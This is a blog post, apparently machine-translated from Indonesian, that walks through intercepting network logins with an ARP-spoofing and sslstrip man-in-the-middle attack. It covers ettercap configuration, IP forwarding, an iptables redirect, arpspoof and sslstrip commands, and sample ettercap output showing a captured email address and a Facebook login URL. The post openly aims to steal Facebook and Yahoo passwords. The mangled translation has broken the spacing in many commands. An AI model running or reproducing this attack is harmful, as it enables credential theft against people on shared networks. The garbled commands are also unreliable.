http://www.prcheckingtool.com

Jumat, 20 Mei 2011

Sniffing network by SSL (https,http) 100%

Network Sniffing with SSL (https, http) 100%Maybe you already know about what it is sniffing, sniffing, or with other words intercepts packets through the network. so when a user & password through the network can be dangerous ..... Malignant wauuuuu too well: p. means we can tap (steal) user & password (facebook, yahoo, etc) in the network.I use OS 4 Final Backtrack and Ettercap applications, SSLSTRIP, ARPSpoof, IPTABLES if no please search on google n downloadOk immediately wrote to the technique:1. Cappuccino Coffee, Cigarettes Sampoerna, n Network Connection with a speed of 1 GBP / s: p2. Edit the file / etc / etter.conf

    
root @ bt: ~ # kwrite / etc / etter.conf

Search this section

    
# If you use iptables:
    
# Redir_command_on = "iptables-t nat-A PREROUTING-i% IFACE-p tcp - dport% port-j REDIRECT - to-port% rport"
    
# Redir_command_off = "iptables-t nat-D PREROUTING-i% IFACE-p tcp - dport% port-j REDIRECT - to-port% rport"

Then Remove the # like this:

    
# If you use iptables:
    
redir_command_on = "iptables-t nat-A PREROUTING-i% IFACE-p tcp - dport% port-j REDIRECT - to-port% rport"
    
redir_command_off = "iptables-t nat-D PREROUTING-i% IFACE-p tcp - dport% port-j REDIRECT - to-port% rport"

3. Enable IP Forward

    
echo 1> / proc/sys/net/ipv4/ip_forward

4. Redirect port 80 to port 10000 (sslstrip)

    
root @ bt: ~ # iptables-t nat-A PREROUTING-p tcp - destination-port 80-j REDIRECT - to-ports 10 000

5. Ok now run ArpSpoofingExamplesTarget: 192.168.2.105Gateway: 192.168.2.244


    
root @ bt: ~ # arpspoof-t-i wlan0 192.168.2.105 192.168.2.244

6. Then Run SSLSTRIP

    
root @ bt: ~ # sslstrip-a-k-f

7. Ok Last step Run ettercap

    
root @ bt: ~ # ettercap-T-q-i wlan0

To view the User and target Passsword when logged in (facebook, yahoo, etc) clay on ettercap tab like this, n not in close:

    
root @ bt: ~ # ettercap-T-q-i wlan0


    
ettercap NG-0.7.3 copyright 2001-2004 Alor & DRAGONS
    
Listening on wlan0 ... (Ethernet)

    
wlan0 -> 00:17: C4: 9E: FE: 24 192.168.2.108 255.255.255.0

    
Privileges dropped to UID GID 65 534 65 534 ...

    
28 plugins
    
39 protocol dissectors
    
53 ports monitored
    
Mac vendor fingerprint 7587
    
1698 tcp OS fingerprint
    
2183 known services

    
Starting Unified sniffing ...

    
Text only Interface activated ...
    
Hit 'h' for inline help

    
HTTP: 69.63.181.26:80 -> USER: [email] toovix07@yahoo.com [/ email] PASS: (secret: p) INFO: [url] http://www.facebook.com/login.php?api_key = 965dc598471b823e0da74090bfe054bc & v = 1.0 & next = http://facebook.poker.zynga.com/poker/playa.php?uid=10000119039 [/ url]

Tidak ada komentar:

Posting Komentar